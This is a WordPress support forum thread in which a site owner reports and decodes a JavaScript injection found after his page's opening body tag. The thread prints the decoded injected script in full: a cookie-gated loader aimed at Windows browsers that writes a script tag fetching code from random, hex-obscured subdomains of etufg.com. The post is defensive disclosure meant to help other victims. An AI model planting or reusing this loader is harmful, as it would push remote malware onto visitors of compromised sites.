Title: Javascript Injection Report – based in etufg.com
Last modified: August 19, 2016

---

# Javascript Injection Report – based in etufg.com

 *  [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/)
 * I have just discovered an incident of Javascript Injection on my WordPress-based
   website. I am running the latest version of WP, and all associated plugins.
 * The raw code is inserted just after the opening `body` tag.
 * The raw code is:
 * `[hack code moderated]`
 * This can be decoded to:
 * `<ads><script type="text/javascript">document.write( <script>var a=document.cookie;
   document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=""
   +document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){
   e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(
   d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","
   kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*
   g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("
   hip")+";expires="+dt.toGMTString()+";path=/";document.write('<script type="text/
   javascript" src="http://'+g[h]+'.\x65\x74\x75\x66\x67\x2e\x63\x6f\x6d/tools/js.
   js"><\/script>')};</script> );</script></ads>`
 * The URL at the end, which seems to be the co-ordinating centre for the attack
   is in Hex, and translates to:
 * **etufg.com**
 * So, this code seems to be randomly picking one of the following subdomains within
   that domain:
    - keg.etufg.com
    - kei.etufg.com
    - ken.etufg.com
    - kep.etufg.com
    - kev.etufg.com
    - kex.etufg.com
    - key.etufg.com
    - khi.etufg.com
    - kid.etufg.com
    - kif.etufg.com
 * I would not be surprised if further subdomains and/or domains are involved, but
   this is just the rest of my first 40 minutes of investigations.

Viewing 6 replies - 1 through 6 (of 6 total)

 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642721)
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642747)
 * Thanks Samuel, I was more posting it here as it seems to be code which either
   has not been seen before, or has not been written up like this before (I Googled
   for segments of the code above, but found no matches).
 * Just trying to save someone else a bit of time, effort, and hair should more 
   people be affected.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642748)
 * post it at pastebin.com and bring the link back here
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642761)
 * [Pastebin of Hack Code](http://pastebin.com/rqQMaGGF)
 * Not that I can see the point of putting the code on Pastebin, where it might 
   be found through Googling, but with no links back to this Forum post – creating
   a dead-end for anyone investigating their problem. But, as you are the Mod, I
   will defer to your judgement.
 *  [Samuel B](https://wordpress.org/support/users/samboll/)
 * (@samboll)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642778)
 * the problem putting it here is everyone’s virus alert will start going off and
   I really don’t want to deal with all the “omg, the forum’s hacked” threads and
   emails
    :>)
 *  Thread Starter [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * (@lucanos)
 * [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642813)
 * But the code had been rendered into HTML and would not execute – so it should
   not have set off any kind of alerts.
 * Any content I share her as a Post is parsed to make it readable – ie “`<`” changes
   to “`& lt;`” (space added to prevent parser from doing the same here), etc. which
   means that, from the view of the browser, it is content rather than structure
   and will be displayed, but not executed.
 * I don’t understand your point.

Viewing 6 replies - 1 through 6 (of 6 total)

The topic ‘Javascript Injection Report – based in etufg.com’ is closed to new replies.

## Tags

 * [attack](https://wordpress.org/support/topic-tag/attack/)
 * [javascript](https://wordpress.org/support/topic-tag/javascript/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 6 replies
 * 2 participants
 * Last reply from: [Luke Stevenson](https://wordpress.org/support/users/lucanos/)
 * Last activity: [15 years, 9 months ago](https://wordpress.org/support/topic/javascript-injection-report-based-in-etufgcom/#post-1642813)
 * Status: not a support question

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics